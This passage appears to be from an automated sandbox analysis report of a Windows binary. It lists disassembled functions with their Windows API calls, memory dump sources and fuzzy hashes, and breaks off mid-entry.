                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                • Opcode ID: 29020f01c12a39d1c2415ec6e1e500599b6b621ddf5bdd5bbcfd8d185b8e9c00
                                                                                                                                                                                                                                                                • Instruction ID: 538021ee92b0fda72ae64e65a7f383894feedbda5eb67277136e180ea9e51585
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29020f01c12a39d1c2415ec6e1e500599b6b621ddf5bdd5bbcfd8d185b8e9c00
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E331E071900219EFDB14DFA8DD88BEE3BB5EB04315F004329F921AB2E1D774A940CB90
                                                                                                                                                                                                                                                                Function 00A9D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00A9CC63,00000000), ref: 00A9D97D
                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00A9D9B4
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,?,00A9CC63,00000000), ref: 00A9D9F9
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A9CC63,00000000), ref: 00A9DA0D
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A9CC63,00000000), ref: 00A9DA37
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                • Opcode ID: 2a79ba5c55dc466f8787140c340f4a8de722d2a30015183cace5016348ebebd4
                                                                                                                                                                                                                                                                • Instruction ID: 4b2053174eea92666fafe4bd4654ceb8942ec3d55311879d0d311a4a0d993fee
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a79ba5c55dc466f8787140c340f4a8de722d2a30015183cace5016348ebebd4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F315C71604205EFDF20EFA5D885EABBBF8EB04354B10452EE546E2551EB30EE81DB60
                                                                                                                                                                                                                                                                Function 00AB61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00AB61E4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AB623C
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB624E
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB6259
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AB62B5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 763830540-0
                                                                                                                                                                                                                                                                • Opcode ID: 8688b2966670567694f159cf0e3669079096c6dca7edaf09040fef4888d3d679
                                                                                                                                                                                                                                                                • Instruction ID: 0853ba56344cd74a86576c42e348ba8891c9ad8af61e39ee46e2e9db2ca48cf8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8688b2966670567694f159cf0e3669079096c6dca7edaf09040fef4888d3d679
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84217175D002189AEB10DFA4CC84AEEBBBCFB44324F144256FA25EB182DB749985CF50
                                                                                                                                                                                                                                                                Function 00AA138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 00AA13AE
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00AA13C5
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00AA1401
                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00AA140D
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 00AA1445
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                • Opcode ID: c73dd29777d6250a5da29a9ca71ac2e9312295359f0858ebde28f8efab65e59e
                                                                                                                                                                                                                                                                • Instruction ID: f06fbe70856943fc6db5c3cbc042af6f3c78adac6751cd4c56de3b3dee020def
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c73dd29777d6250a5da29a9ca71ac2e9312295359f0858ebde28f8efab65e59e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF21A135600214AFDB04EFA9D994A9EBBF9EF48300B048539E84A97362DB30AD45DF90
                                                                                                                                                                                                                                                                Function 00A5D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00A5D146
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A5D169
                                                                                                                                                                                                                                                                  • Part of subcall function 00A53B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A46A79,?,0000015D,?,?,?,?,00A485B0,000000FF,00000000,?,?), ref: 00A53BC5
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A5D18F
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5D1A2
                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A5D1B1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                                                                                                                • Opcode ID: 67dab7769c6802c0c0a36dd44484f1426a695c80aafdbc6a943b55e660b78f88
                                                                                                                                                                                                                                                                • Instruction ID: 90df2f7480f1fb1ae6625bc435a49ebc4ce8e96e05e89d6a2ca8128785e2caf1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67dab7769c6802c0c0a36dd44484f1426a695c80aafdbc6a943b55e660b78f88
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD018876601A157F373167BA5C4CD7B6A7DFEC2B623150329FD05CA155EA708D0582B0
                                                                                                                                                                                                                                                                Function 00A86078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _memcmp
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                • Opcode ID: 1368cb796d932dc6ee450b1f69f73e3ada451171a4b53b4f259b3983042444c4
                                                                                                                                                                                                                                                                • Instruction ID: 9e90d2e10e0e1010c5fce7aec3162ac6cdcf2e65de9c5dba5c13bd711b3e7a00
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1368cb796d932dc6ee450b1f69f73e3ada451171a4b53b4f259b3983042444c4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3701D8F5644305BBF714B7209D82FAB737DAE50398F018425FD069B242E761ED50C7A9
                                                                                                                                                                                                                                                                Function 00A5316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(0000000A,?,?,00A4F64E,00A4545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A53170
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A531A5
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A531CC
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A531D9
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A531E2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                • Opcode ID: 9246c6492661087e3462c76b400c5f2e4f34119dcff2239755028826a7820513
                                                                                                                                                                                                                                                                • Instruction ID: 75ffaa2b8e16aecea3f64f506b19c11b0e435bcb7270cb79115a406d16bd21a6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9246c6492661087e3462c76b400c5f2e4f34119dcff2239755028826a7820513
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF01D177640E007B9E12A774AD85E2A2AA9BFD13F37200728FC1596193EF318A0E5260
                                                                                                                                                                                                                                                                Function 00A808FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?,?,00A80C4E), ref: 00A8091B
                                                                                                                                                                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?), ref: 00A80936
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?), ref: 00A80944
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?), ref: 00A80954
                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?), ref: 00A80960
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                • Opcode ID: 2525f5dcfe5f43f57979f5edafac391b540f9bfe519debadb2ddf953aaf83103
                                                                                                                                                                                                                                                                • Instruction ID: 0efda39e00ffe248e7dfb8275cc545063beda90eefc985b72560bbf9c2c4560d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2525f5dcfe5f43f57979f5edafac391b540f9bfe519debadb2ddf953aaf83103
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0601DF72600204AFEB409FA8DC04F9A7ABCEF44752F100224F905E2222F770CD018BA0
                                                                                                                                                                                                                                                                Function 00A8F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00A8F2AE
                                                                                                                                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 00A8F2BC
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00A8F2C4
                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00A8F2CE
                                                                                                                                                                                                                                                                • Sleep.KERNEL32 ref: 00A8F30A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                • Opcode ID: 82ec371bf7c8535544df96bdcd205d1c26e3c1c7f2da8ff117a233af2aea8570
                                                                                                                                                                                                                                                                • Instruction ID: f67b2f592b5af42164a2ba48c7ebfa13a183bfef4c6c57d8309b9e4eead4d8e4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82ec371bf7c8535544df96bdcd205d1c26e3c1c7f2da8ff117a233af2aea8570
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A016975C0161ADFCF00EFE9E849AEEBB78FB08700F000666E552B2261EB309554C7A1
                                                                                                                                                                                                                                                                Function 00A81A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A81A60
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A6C
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A7B
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A814E7,?,?,?), ref: 00A81A82
                                                                                                                                                                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A81A99
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 842720411-0
                                                                                                                                                                                                                                                                • Opcode ID: 48551f8243fc964bb0f4c3227086410f209595e3b6759bb626f93442013232ed
                                                                                                                                                                                                                                                                • Instruction ID: d2bdefb7bc12ef586607cbae8d2d62c99ef1301b2e67cd99a25407167c78ebb2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48551f8243fc964bb0f4c3227086410f209595e3b6759bb626f93442013232ed
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F0181B9601205BFDB159FA4DC48D6A3B6DEF843A4B210524F845D7261EA31DC428A60
                                                                                                                                                                                                                                                                Function 00A81900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A81916
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A81922
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A81931
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A81938
                                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A8194E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 44706859-0
                                                                                                                                                                                                                                                                • Opcode ID: b965e6977406430946ea7d777aa6b145a1b47af18992292c71d35dca7cca0448
                                                                                                                                                                                                                                                                • Instruction ID: d1db0df2f17eb816a82f4f17296f838db782afdeed704cf616d2c2cf382ed307
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b965e6977406430946ea7d777aa6b145a1b47af18992292c71d35dca7cca0448
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5F06275100302ABDB215FA9EC4DF963BADEF897A0F110524FA45D7262DA70DC028B60
                                                                                                                                                                                                                                                                Function 00A81960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A81976
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A81982
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A81991
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A81998
                                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A819AE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 44706859-0
                                                                                                                                                                                                                                                                • Opcode ID: 5c5f9d4d96d1eee7204a379b09ab9112779ebbae1e0dfc8a0c28c5c9131ee65d
